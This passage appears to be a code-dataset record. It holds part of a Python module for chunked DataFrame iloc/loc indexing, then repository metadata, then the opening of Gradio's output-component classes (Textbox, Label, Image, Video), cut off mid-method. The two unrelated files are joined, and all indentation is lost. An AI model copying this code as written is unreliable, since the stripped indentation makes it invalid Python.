axis: Union[Tuple[int], int]) -> Chunk:
dataframe_op_type = type(chunks[0].op)
# create tileable from chunks
concat_tileable = \
dataframe_op_type.create_tileable_from_chunks(chunks, inputs=chunks)
# concat chunks
chunk = dataframe_op_type.concat_tileable_chunks(concat_tileable).chunks[0]
if chunk.ndim > 1 and \
((isinstance(axis, tuple) and len(axis) == 1) or isinstance(axis, int)):
# adjust index and axis
axis = axis[0] if isinstance(axis, tuple) else axis
chunk.op._axis = axis
chunk_index = list(chunk.index)
chunk_index[1 - axis] = chunks[0].index[1 - axis]
chunk._index = tuple(chunk_index)
return chunk
def create_chunk(self,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo) -> Chunk:
chunk_op = self.op.copy().reset_key()
chunk_op._indexes = indexes = chunk_index_info.indexes
chunk_op._stage = OperandStage.map
chunk_input = self.tileable.cix[chunk_index]
chunk_inputs = filter_inputs([chunk_input] + indexes)
kw = {}
kw['shape'] = shape = tuple(chunk_index_info.output_chunk_shape)
kw['index'] = tuple(chunk_index_info.output_chunk_index)
index_values = chunk_index_info.index_values
if len(shape) == 0:
# scalar
chunk_op._object_type = ObjectType.scalar
kw['dtype'] = self.op.outputs[0].dtype
elif len(shape) == 1:
# Series
chunk_op._object_type = ObjectType.series
kw['index_value'] = index_values[0]
kw['dtype'] = self.op.outputs[0].dtype
kw['name'] = getattr(self.op.outputs[0], 'name', None)
else:
# dataframe
chunk_op._object_type = ObjectType.dataframe
kw['index_value'] = index_values[0]
kw['columns_value'] = index_values[1]
kw['dtypes'] = chunk_index_info.dtypes
return chunk_op.new_chunk(chunk_inputs, kws=[kw])
class SliceIndexHandler(SliceIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
slc = index
kw = {
'output_axis_index': output_axis_index,
'processed_index': slc,
'output_shape': output_shape,
'dtypes': None
}
if index_info.input_axis == 0:
index = chunk_input.index_value.to_pandas()
kw['index_value'] = parse_index(index[slc], chunk_input, slc,
store_data=False)
else:
assert index_info.input_axis == 1
index = chunk_input.columns_value.to_pandas()
# do not store index value if output axis is 0
store_data = True if index_info.output_axis == 1 else False
kw['index_value'] = parse_index(index[slc], store_data=store_data)
kw['dtypes'] = chunk_input.dtypes[slc]
chunk_index_info.set(ChunkIndexAxisInfo(**kw))
class LabelSliceIndexHandler(IndexHandler):
def accept(cls, raw_index):
return isinstance(raw_index, slice)
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = IndexInfo(IndexType.label_slice,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.output_axis += 1
context.append(info)
return info
@staticmethod
def _slice_all(slc):
return slc.start is None and slc.stop is None and \
(slc.step is None or slc.step == 1)
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
index_value = [tileable.index_value, tileable.columns_value][input_axis]
# check if chunks have unknown shape
check = False
if index_value.has_value():
# index_value has value,
check = True
elif self._slice_all(index_info.raw_index):
# if slice on all data
check = True
if check:
if any(np.isnan(ns) for ns in tileable.nsplits[input_axis]):
raise TilesError('Input tileable {} has chunks with unknown shape '
'on axis {}'.format(tileable, input_axis))
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
slc = index
kw = {
'output_axis_index': output_axis_index,
'processed_index': slc,
'output_shape': output_shape,
'dtypes': None
}
if index_info.input_axis == 0:
index = chunk_input.index_value.to_pandas()
start, stop = index.slice_locs(slc.start, slc.stop, slc.step, kind='loc')
pos_slc = slice(start, stop, slc.step)
kw['index_value'] = parse_index(index[pos_slc], chunk_input, slc,
store_data=False)
else:
assert index_info.input_axis == 1
dtypes = chunk_input.dtypes
# do not store index value if output axis is 0
store_data = True if index_info.output_axis == 1 else False
columns = dtypes.loc[slc].index
kw['index_value'] = parse_index(columns, store_data=store_data)
kw['dtypes'] = chunk_input.dtypes[slc]
chunk_index_info.set(ChunkIndexAxisInfo(**kw))
def _process_has_value_index(self,
tileable: TileableEntity,
index_info: IndexInfo,
index_value,
input_axis: int,
context: IndexHandlerContext) -> None:
pd_index = index_value.to_pandas()
if self._slice_all(index_info.raw_index):
slc = slice(None)
else:
# turn label-based slice into position-based slice
start, end = pd_index.slice_locs(index_info.raw_index.start,
index_info.raw_index.stop,
index_info.raw_index.step,
kind='loc')
slc = slice(start, end, index_info.raw_index.step)
cum_nsplit = [0] + np.cumsum(tileable.nsplits[index_info.input_axis]).tolist()
# split position-based slice into chunk slices
effected_i_to_slc = slice_split(slc, tileable.nsplits[index_info.input_axis])
is_reversed = (slc.step or 0) < 0
output_axis_index_range = range(len(effected_i_to_slc)) if not is_reversed else \
range(len(effected_i_to_slc) - 1, -1, -1)
other_index_to_iter = dict()
index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in index_to_info.items():
i = chunk_index[input_axis]
other_index = chunk_index[:input_axis] + chunk_index[input_axis + 1:]
size = tileable.nsplits[input_axis][i]
if i not in effected_i_to_slc:
# delete it, the input chunk could be ignored
del context.chunk_index_to_info[chunk_index]
else:
chunk_slc = effected_i_to_slc[i]
output_shape = calc_sliced_size(size, chunk_slc)
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = iter(output_axis_index_range)
output_axis_index = next(other_index_to_iter[other_index])
# turn position-based slice back into label-based slice
start = chunk_slc.start
if start is not None:
abs_start = cum_nsplit[i] + start
label_start = pd_index[abs_start]
else:
label_start = None
stop = chunk_slc.stop
if stop is not None:
abs_stop = cum_nsplit[i] + stop - 1 # label slice include the stop
label_stop = pd_index[abs_stop] if abs_stop < len(pd_index) else None
else:
label_stop = None
label_slc = slice(label_start, label_stop, chunk_slc.step)
self.set_chunk_index_info(context, index_info, chunk_index, chunk_index_info,
output_axis_index, label_slc, output_shape)
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value() or self._slice_all(index_info.raw_index):
self._process_has_value_index(tileable, index_info,
index_value, input_axis, context)
else:
other_index_to_iter = dict()
# slice on all chunks on the specified axis
for chunk_index, chunk_index_info in context.chunk_index_to_info.items():
other_index = chunk_index[:1] if input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
index_info.raw_index, np.nan)
class LabelIndexHandler(IndexHandler):
def accept(cls, raw_index):
# accept type other than slice, ndarray and tensor
return not isinstance(raw_index, (slice, np.ndarray, TENSOR_TYPE))
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
tileable = context.tileable
input_axis = context.input_axis
if tileable.ndim == 2:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
else:
index_value = tileable.index_value
if index_value.has_value():
pd_index = index_value.to_pandas()
loc = pd_index.get_loc(raw_index)
if isinstance(loc, slice):
# if is slice, means index not unique, but monotonic
# just call LabelSliceIndexHandler
new_raw_index = slice(raw_index, raw_index)
return LabelSliceIndexHandler.get_instance().parse(new_raw_index, context)
elif isinstance(loc, np.ndarray):
# bool indexing, non unique, and not monotonic
return NDArrayBoolIndexHandler.get_instance().parse(loc, context)
else:
return LabelNDArrayFancyIndexHandler.get_instance().parse(raw_index, context)
info = IndexInfo(IndexType.label,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.append(info)
return info
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
# if index has value on input axis,
# label will be converted to position,
# thus chunks cannot have unknown shape on this axis
tileable = context.tileable
input_axis = index_info.input_axis
if tileable.ndim == 1:
index_value = tileable.index_value
else:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value():
if any(np.isnan(ns) for ns in tileable.nsplits[input_axis]):
raise TilesError('Input tileable {} has chunks with unknown shape '
'on axis {}'.format(tileable, input_axis))
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
if tileable.ndim == 1:
index_value = tileable.index_value
else:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
if index_value.has_value():
pd_index = index_value.to_pandas()
loc = pd_index.get_loc(index_info.raw_index)
# other situations have been delegated to different handlers
assert isinstance(loc, int)
effected_i_to_slc = slice_split(loc, tileable.nsplits[index_info.input_axis])
index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in index_to_info.items():
i = chunk_index[input_axis]
if i not in effected_i_to_slc:
# delete it, the input chunk could be ignored
del context.chunk_index_to_info[chunk_index]
else:
chunk_index_info.set(ChunkIndexAxisInfo(output_axis_index=None,
processed_index=index_info.raw_index,
output_shape=None,
index_value=None,
dtypes=None))
class DataFrameIndexHandler:
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
dtypes = None
if index_info.input_axis == 0:
index_value = parse_index(chunk_input.index_value.to_pandas(),
chunk_input, index, store_data=False)
else:
dtypes = getattr(chunk_input.dtypes, cls.kind)[index]
columns = dtypes.index
index_value = parse_index(columns, store_data=True)
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=dtypes)
chunk_index_info.set(info)
class NDArrayBoolIndexHandler(NDArrayBoolIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
if index_info.input_axis == 0:
dtype = chunk_input.index_value.to_pandas().dtype
index_value = parse_index(pd.Index([], dtype=dtype),
chunk_input, index, store_data=False)
dtypes = None
else:
pd_index = chunk_input.columns_value.to_pandas()
filtered_index = pd_index[index]
index_value = parse_index(filtered_index, store_data=True)
dtypes = chunk_input.dtypes[index]
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=dtypes)
chunk_index_info.set(info)
class TensorBoolIndexHandler(TensorBoolIndexHandlerBase):
@classmethod
def set_chunk_index_info(cls,
context: IndexHandlerContext,
index_info: IndexInfo,
chunk_index: Tuple[int],
chunk_index_info: ChunkIndexInfo,
output_axis_index: int,
index,
output_shape: int):
tileable = context.tileable
chunk_input = tileable.cix[chunk_index]
assert index_info.input_axis == 0, \
'bool indexing on axis columns cannot be tensor'
index_value = parse_index(pd.Index([], chunk_input.index_value.to_pandas().dtype),
chunk_input, index, store_data=False)
info = ChunkIndexAxisInfo(output_axis_index=output_axis_index,
processed_index=index,
output_shape=output_shape,
index_value=index_value,
dtypes=None)
chunk_index_info.set(info)
class _FancyIndexHandler(DataFrameIndexHandler, IndexHandler):
@classproperty
def kind(self): # pylint: disable=no-self-use
return 'iloc'
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = FancyIndexInfo(IndexType.fancy_index,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
context.output_axis += 1
context.append(info)
return info
class NDArrayFancyIndexHandler(_FancyIndexHandler):
def accept(cls, raw_index):
# raw index like list, and pd.Series
# would have been converted to ndarray or tensor already
return isinstance(raw_index, np.ndarray) and \
raw_index.dtype != np.bool_
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
check_chunks_unknown_shape([tileable], TilesError)
# split raw index into chunks on the given axis
split_info = split_indexes_into_chunks([tileable.nsplits[index_info.input_axis]],
[index_info.raw_index])
index_info.split_info = split_info
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
chunk_index_to_fancy_index_arrays = index_info.split_info[0]
other_index_to_iter = dict()
chunk_index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in chunk_index_to_info.items():
i = chunk_index[index_info.input_axis]
fancy_index_array = chunk_index_to_fancy_index_arrays[i, ][0]
if fancy_index_array.size == 0:
# not effected
del context.chunk_index_to_info[chunk_index]
continue
other_index = chunk_index[:1] if index_info.input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
output_axis_shape = fancy_index_array.shape[0]
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
fancy_index_array, output_axis_shape)
@classmethod
def need_postprocess(cls,
index_info: IndexInfo,
context: IndexHandlerContext):
tileable = context.tileable
if tileable.chunk_shape[index_info.input_axis] == 1:
# if tileable only has 1 chunk on this axis
# do not need postprocess
return False
# if ascending sorted, no need to postprocess
return not index_info.split_info[2]
def postprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
# could be 2 fancy indexes at most
fancy_indexes = context.get_indexes(index_info.index_type)
i_fancy_index = fancy_indexes.index(index_info)
need_postprocesses = [fancy_index.handler.need_postprocess(fancy_index, context)
for fancy_index in fancy_indexes]
if not need_postprocesses[i_fancy_index]:
# do not need postprocess
return
if i_fancy_index == 0 and len(fancy_indexes) == 2 and need_postprocesses[1] and \
isinstance(fancy_indexes[1].raw_index, np.ndarray):
# check if need postprocess if 2 fancy indexes and now it's the first,
# if so, skip postprocess for this one,
# and do MapReduce just once for the second postprocess
return
chunks, nsplits = context.out_chunks, context.out_nsplits
index_to_chunks = {c.index: c for c in chunks}
to_concat_axes = tuple(fancy_index.output_axis
for i, fancy_index in enumerate(fancy_indexes)
if need_postprocesses[i])
reorder_indexes = [calc_pos(fancy_index.raw_index.shape, fancy_index.split_info[1])
for i, fancy_index in enumerate(fancy_indexes)
if need_postprocesses[i]]
new_out_chunks = []
for chunk_index in itertools.product(
*(range(len(ns)) for ax, ns in enumerate(nsplits)
if ax not in to_concat_axes)):
if len(to_concat_axes) == 2:
to_concat_chunks = chunks
else:
to_concat_chunks = []
for i in range(len(nsplits[to_concat_axes[0]])):
to_concat_index = list(chunk_index)
to_concat_index.insert(to_concat_axes[0], i)
to_concat_chunks.append(index_to_chunks[tuple(to_concat_index)])
concat_chunk = context.concat_chunks(to_concat_chunks, to_concat_axes)
reorder_chunk = self._create_reorder_chunk(concat_chunk, to_concat_axes,
reorder_indexes, context)
new_out_chunks.append(reorder_chunk)
new_nsplits = list(nsplits)
for fancy_index in fancy_indexes:
new_nsplits[fancy_index.output_axis] = (fancy_index.raw_index.shape[0],)
context.out_chunks = new_out_chunks
context.out_nsplits = new_nsplits
@classmethod
def _create_reorder_chunk(cls,
concat_chunk: Chunk,
to_concat_axes: Tuple,
reorder_indexes: List,
context: IndexHandlerContext):
reorder_chunk_op = context.op.copy().reset_key()
indexes = [slice(None)] * concat_chunk.ndim
for ax, reorder_index in zip(to_concat_axes, reorder_indexes):
indexes[ax] = reorder_index
reorder_chunk_op._indexes = indexes
params = concat_chunk.params
if isinstance(concat_chunk, SERIES_CHUNK_TYPE):
if concat_chunk.index_value.has_value():
# if concat chunk's index has value, we could calculate the new index
reorder_index = concat_chunk.index_value.to_pandas()[reorder_indexes[0]]
params['index_value'] = parse_index(reorder_index, store_data=True)
else:
params['index_value'] = parse_index(concat_chunk.index_value.to_pandas(), indexes)
return reorder_chunk_op.new_chunk([concat_chunk], kws=[params])
else:
if 0 in to_concat_axes:
if concat_chunk.index_value.has_value():
# if concat chunk's index has value, and index on axis 0,
# we could calculate the new index
reorder_index = concat_chunk.index_value.to_pandas()[reorder_indexes[0]]
params['index_value'] = parse_index(reorder_index, store_data=True)
else:
params['index_value'] = parse_index(concat_chunk.index_value.to_pandas(),
indexes[0])
if 1 in to_concat_axes:
reorder_columns = concat_chunk.columns_value.to_pandas()[reorder_indexes[-1]]
params['columns_value'] = parse_index(reorder_columns, store_data=True)
params['dtypes'] = concat_chunk.dtypes[reorder_indexes[-1]]
return reorder_chunk_op.new_chunk([concat_chunk], kws=[params])
class _LabelFancyIndexHandler(DataFrameIndexHandler, IndexHandler):
@classproperty
def kind(self): # pylint: disable=no-self-use
return 'loc'
class LabelNDArrayFancyIndexHandler(_LabelFancyIndexHandler):
def accept(cls, raw_index):
return isinstance(raw_index, np.ndarray) and \
raw_index.dtype != np.bool_
def parse(self,
raw_index,
context: IndexHandlerContext) -> IndexInfo:
info = LabelFancyIndexInfo(IndexType.label_fancy_index,
context.input_axis,
context.output_axis,
raw_index,
self)
context.input_axis += 1
if not np.isscalar(raw_index):
context.output_axis += 1
context.append(info)
return info
def preprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
check_chunks_unknown_shape([tileable], TilesError)
input_axis = index_info.input_axis
if tileable.ndim == 2:
index_value = [tileable.index_value, tileable.columns_value][input_axis]
else:
index_value = tileable.index_value
cum_nsplit = [0] + np.cumsum(tileable.nsplits[input_axis]).tolist()
if index_value.has_value():
# turn label-based fancy index into position-based
pd_index = index_value.to_pandas()
positions = convert_labels_into_positions(pd_index, index_info.raw_index)
split_info = split_indexes_into_chunks([tileable.nsplits[input_axis]],
[positions])
chunk_index_to_pos = split_info[0]
is_asc_sorted = split_info[-1]
# convert back to labels for chunk_index
chunk_index_to_labels = dict()
for chunk_index, pos in chunk_index_to_pos.items():
# chunk_index and pos are all list with 1 element
abs_pos = pos[0] + cum_nsplit[chunk_index[0]]
chunk_labels = to_numpy(pd_index[abs_pos])
chunk_index_to_labels[chunk_index[0]] = chunk_labels
index_info.is_label_asc_sorted = is_asc_sorted
index_info.chunk_index_to_labels = chunk_index_to_labels
else:
index = index_info.raw_index
if np.isscalar(index):
# delegation from label index handler
index = np.atleast_1d(index)
# does not know the right positions, need postprocess always
index_info.is_label_asc_sorted = False
# do df.loc on each chunk
index_info.chunk_index_to_labels = \
{i: index for i in range(tileable.chunk_shape[input_axis])}
def process(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
tileable = context.tileable
input_axis = index_info.input_axis
chunk_index_to_labels = index_info.chunk_index_to_labels
other_index_to_iter = dict()
chunk_index_to_info = context.chunk_index_to_info.copy()
for chunk_index, chunk_index_info in chunk_index_to_info.items():
i = chunk_index[input_axis]
chunk_labels = chunk_index_to_labels[i]
size = chunk_labels.size
if size == 0:
# not effected
del context.chunk_index_to_info[chunk_index]
continue
if np.isscalar(index_info.raw_index) and \
isinstance(tileable.index_value.value, IndexValue.DatetimeIndex) and \
isinstance(chunk_labels[0], str):
# special case when index is DatetimeIndex and loc by string
# convert back list to scalar because if keep list,
# KeyError will always happen
chunk_labels = chunk_labels[0].item()
other_index = chunk_index[:1] if input_axis == 1 else chunk_index[1:]
if other_index not in other_index_to_iter:
other_index_to_iter[other_index] = itertools.count()
output_axis_index = next(other_index_to_iter[other_index])
output_axis_shape = size
self.set_chunk_index_info(context, index_info, chunk_index,
chunk_index_info, output_axis_index,
chunk_labels, output_axis_shape)
@classmethod
def need_postprocess(cls,
index_info: IndexInfo,
context: IndexHandlerContext):
# if ascending sorted, no need to postprocess
return not index_info.is_label_asc_sorted
def postprocess(self,
index_info: IndexInfo,
context: IndexHandlerContext) -> None:
if not self.need_postprocess(index_info, context):
# do not need postprocess
return
chunks, nsplits = context.out_chunks, context.out_nsplits
index_to_chunks = {c.index: c for c in chunks}
axis = index_info.output_axis
new_out_chunks = []
chunk_axis_shapes = dict()
for chunk_index in itertools.product(*(range(len(ns)) for ax, ns in enumerate(nsplits)
if ax != axis)):
to_concat_chunks = []
for i in range(len(nsplits[axis])):
if axis == 0:
to_concat_index = (i,) + chunk_index
else:
to_concat_index = chunk_index + (i,)
to_concat_chunks.append(index_to_chunks[to_concat_index])
concat_chunk = context.concat_chunks(to_concat_chunks, axis)
chunk_op = context.op.copy().reset_key()
indexes = [slice(None)] * len(nsplits)
indexes[axis] = index_info.raw_index
params = concat_chunk.params
if np.isscalar(index_info.raw_index):
assert axis == 0
if 'columns_value' in params:
params['index_value'] = params.pop('columns_value')
params['dtype'] = find_common_type(params['dtypes'].tolist())
del params['dtypes']
if getattr(context.op.outputs[0], 'name', None) is not None:
params['name'] = context.op.outputs[0].name
if len(params['index']) == chunks[0].ndim:
index = list(params['index'])
index.pop(index_info.output_axis)
params['index'] = tuple(index)
shape = list(params['shape'])
shape.pop(index_info.output_axis)
params['shape'] = tuple(shape)
if context.op.outputs[0].ndim == 0:
del params['index_value']
elif axis == 0:
params['index_value'] = parse_index(pd.Index(index_info.raw_index), store_data=False)
else:
params['dtypes'] = dtypes = concat_chunk.dtypes.loc[index_info.raw_index]
params['columns_value'] = parse_index(dtypes.index, store_data=True)
shape = list(params['shape'])
shape[1] = len(dtypes)
chunk_op._indexes = indexes
out_chunk = chunk_op.new_chunk([concat_chunk], kws=[params])
if len(out_chunk.shape) != 0:
chunk_axis_shapes[out_chunk.index[axis]] = out_chunk.shape[axis]
new_out_chunks.append(out_chunk)
new_nsplits = list(nsplits)
if np.isscalar(index_info.raw_index):
new_nsplits = new_nsplits[:axis] + new_nsplits[axis + 1:]
else:
new_nsplits[axis] = (sum(chunk_axis_shapes.values()),)
context.out_chunks = new_out_chunks
context.out_nsplits = new_nsplits
class DataFrameIlocIndexesHandler(IndexesHandler):
def __init__(self):
super().__init__()
self.register(IntegralIndexHandler,
SliceIndexHandler,
NDArrayBoolIndexHandler,
TensorBoolIndexHandler,
NDArrayFancyIndexHandler)
def create_context(self, op):
return DataFrameIndexHandlerContext(op)
class DataFrameLocIndexesHandler(IndexesHandler):
def __init__(self):
super().__init__()
self.register(LabelIndexHandler,
LabelSliceIndexHandler,
NDArrayBoolIndexHandler,
TensorBoolIndexHandler,
LabelNDArrayFancyIndexHandler)
def create_context(self, op):
return DataFrameIndexHandlerContext(op)
| 43.476404
| 101
| 0.5804
|
b4bec518a3d7310d718870c5b0307edeb03cc55f
| 28,305
|
py
|
Python
|
gradio/outputs.py
|
LysandreJik/gradio
|
64dfcbd390c115d0abe42cd25c69c1384701973c
|
[
"Apache-2.0"
] | null | null | null |
gradio/outputs.py
|
LysandreJik/gradio
|
64dfcbd390c115d0abe42cd25c69c1384701973c
|
[
"Apache-2.0"
] | null | null | null |
gradio/outputs.py
|
LysandreJik/gradio
|
64dfcbd390c115d0abe42cd25c69c1384701973c
|
[
"Apache-2.0"
] | null | null | null |
"""
This module defines various classes that can serve as the `output` to an interface. Each class must inherit from
`OutputComponent`, and each class must define a path to its template. All of the subclasses of `OutputComponent` are
automatically added to a registry, which allows them to be easily referenced in other parts of the code.
"""
from __future__ import annotations
import json
import operator
import os
import tempfile
import warnings
from numbers import Number
from types import ModuleType
from typing import TYPE_CHECKING, Any, Callable, Dict, List, Optional, Tuple
import numpy as np
import pandas as pd
import PIL
from ffmpy import FFmpeg
from gradio import processing_utils
from gradio.component import Component
if TYPE_CHECKING: # Only import for type checking (is False at runtime).
from gradio import Interface
class OutputComponent(Component):
"""
Output Component. All output components subclass this.
"""
def postprocess(self, y):
"""
Any postprocessing needed to be performed on function output.
"""
return y
def deserialize(self, x):
"""
Convert from serialized output (e.g. base64 representation) from a call() to the interface to a human-readable version of the output (path of an image, etc.)
"""
return x
class Textbox(OutputComponent):
"""
Component creates a textbox to render output text or number.
Output type: Union[str, float, int]
Demos: hello_world, sentence_builder
"""
def __init__(self, type: str = "auto", label: Optional[str] = None):
"""
Parameters:
type (str): Type of value to be passed to component. "str" expects a string, "number" expects a float value, "auto" detects return type.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
def get_template_context(self):
return {**super().get_template_context()}
@classmethod
def get_shortcut_implementations(cls):
return {
"text": {"type": "str"},
"textbox": {"type": "str"},
"number": {"type": "number"},
}
def postprocess(self, y):
"""
Parameters:
y (str): text output
Returns:
(Union[str, number]): output value
"""
if self.type == "str" or self.type == "auto":
return str(y)
elif self.type == "number":
return y
else:
raise ValueError(
"Unknown type: " + self.type + ". Please choose from: 'str', 'number'"
)
class Label(OutputComponent):
"""
Component outputs a classification label, along with confidence scores of top categories if provided. Confidence scores are represented as a dictionary mapping labels to scores between 0 and 1.
Output type: Union[Dict[str, float], str, int, float]
Demos: image_classifier, main_note, titanic_survival
"""
CONFIDENCES_KEY = "confidences"
def __init__(
self,
num_top_classes: Optional[int] = None,
type: str = "auto",
label: Optional[str] = None,
):
"""
Parameters:
num_top_classes (int): number of most confident classes to show.
type (str): Type of value to be passed to component. "value" expects a single out label, "confidences" expects a dictionary mapping labels to confidence scores, "auto" detects return type.
label (str): component name in interface.
"""
self.num_top_classes = num_top_classes
self.type = type
super().__init__(label)
def postprocess(self, y):
"""
Parameters:
y (Dict[str, float]): dictionary mapping label to confidence value
Returns:
(Dict[label: str, confidences: List[Dict[label: str, confidence: number]]]): Object with key 'label' representing primary label, and key 'confidences' representing a list of label-confidence pairs
"""
if self.type == "label" or (
self.type == "auto" and (isinstance(y, str) or isinstance(y, Number))
):
return {"label": str(y)}
elif self.type == "confidences" or (
self.type == "auto" and isinstance(y, dict)
):
sorted_pred = sorted(y.items(), key=operator.itemgetter(1), reverse=True)
if self.num_top_classes is not None:
sorted_pred = sorted_pred[: self.num_top_classes]
return {
"label": sorted_pred[0][0],
"confidences": [
{"label": pred[0], "confidence": pred[1]} for pred in sorted_pred
],
}
else:
raise ValueError(
"The `Label` output interface expects one of: a string label, or an int label, a "
"float label, or a dictionary whose keys are labels and values are confidences."
)
def deserialize(self, y):
# 5 cases: (1): {'label': 'lion'}, {'label': 'lion', 'confidences':...}, {'lion': 0.46, ...}, 'lion', '0.46'
if self.type == "label" or (
self.type == "auto"
and (
isinstance(y, str)
or isinstance(y, int)
or isinstance(y, float)
or ("label" in y and not ("confidences" in y.keys()))
)
):
if isinstance(y, str) or isinstance(y, int) or isinstance(y, float):
return y
else:
return y["label"]
elif self.type == "confidences" or self.type == "auto":
if ("confidences" in y.keys()) and isinstance(y["confidences"], list):
return {k["label"]: k["confidence"] for k in y["confidences"]}
else:
return y
raise ValueError("Unable to deserialize output: {}".format(y))
@classmethod
def get_shortcut_implementations(cls):
return {
"label": {},
}
def save_flagged(self, dir, label, data, encryption_key):
"""
Returns: (Union[str, Dict[str, number]]): Either a string representing the main category label, or a dictionary with category keys mapping to confidence levels.
"""
if "confidences" in data:
return json.dumps(
{
example["label"]: example["confidence"]
for example in data["confidences"]
}
)
else:
return data["label"]
def restore_flagged(self, dir, data, encryption_key):
try:
data = json.loads(data)
return self.postprocess(data)
except ValueError:
return data
class Image(OutputComponent):
"""
Component displays an output image.
Output type: Union[numpy.array, PIL.Image, str, matplotlib.pyplot, Tuple[Union[numpy.array, PIL.Image, str], List[Tuple[str, float, float, float, float]]]]
Demos: image_mod, webcam
"""
def __init__(
self, type: str = "auto", plot: bool = False, label: Optional[str] = None
):
"""
Parameters:
type (str): Type of value to be passed to component. "numpy" expects a numpy array with shape (width, height, 3), "pil" expects a PIL image object, "file" expects a file path to the saved image or a remote URL, "plot" expects a matplotlib.pyplot object, "auto" detects return type.
plot (bool): DEPRECATED. Whether to expect a plot to be returned by the function.
label (str): component name in interface.
"""
if plot:
warnings.warn(
"The 'plot' parameter has been deprecated. Set parameter 'type' to 'plot' instead.",
DeprecationWarning,
)
self.type = "plot"
else:
self.type = type
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {"image": {}, "plot": {"type": "plot"}, "pil": {"type": "pil"}}
def postprocess(self, y):
"""
Parameters:
y (Union[numpy.array, PIL.Image, str, matplotlib.pyplot, Tuple[Union[numpy.array, PIL.Image, str], List[Tuple[str, float, float, float, float]]]]): image in specified format
Returns:
(str): base64 url data
"""
if self.type == "auto":
if isinstance(y, np.ndarray):
dtype = "numpy"
elif isinstance(y, PIL.Image.Image):
dtype = "pil"
elif isinstance(y, str):
dtype = "file"
elif isinstance(y, ModuleType):
dtype = "plot"
else:
raise ValueError(
"Unknown type. Please choose from: 'numpy', 'pil', 'file', 'plot'."
)
else:
dtype = self.type
if dtype in ["numpy", "pil"]:
if dtype == "pil":
y = np.array(y)
out_y = processing_utils.encode_array_to_base64(y)
elif dtype == "file":
out_y = processing_utils.encode_url_or_file_to_base64(y)
elif dtype == "plot":
out_y = processing_utils.encode_plot_to_base64(y)
else:
raise ValueError(
"Unknown type: "
+ dtype
+ ". Please choose from: 'numpy', 'pil', 'file', 'plot'."
)
return out_y
def deserialize(self, x):
y = processing_utils.decode_base64_to_file(x).name
return y
def save_flagged(self, dir, label, data, encryption_key):
return self.save_flagged_file(dir, label, data, encryption_key)
def restore_flagged(self, dir, data, encryption_key):
return self.restore_flagged_file(dir, data, encryption_key)["data"]
class Video(OutputComponent):
"""
Used for video output.
Output type: filepath
Demos: video_flip
"""
def __init__(self, type: Optional[str] = None, label: Optional[str] = None):
"""
Parameters:
type (str): Type of video format to be passed to component, such as 'avi' or 'mp4'. Use 'mp4' to ensure browser playability. If set to None, video will keep returned format.
label (str): component name in interface.
"""
self.type = type
super().__init__(label)
@classmethod
def get_shortcut_implementations(cls):
return {"video": {}, "playable_video": {"type": "mp4"}}
def postprocess(self, y):
"""
Parameters:
y (str): path to video
Returns:
(str): base64 url data
"""
returned_format = y.split(".")[-1].lower()
if self.type is not None and returned_format != self.type:
output_file_name = y[0 : y.rindex(".") + 1] + self.type
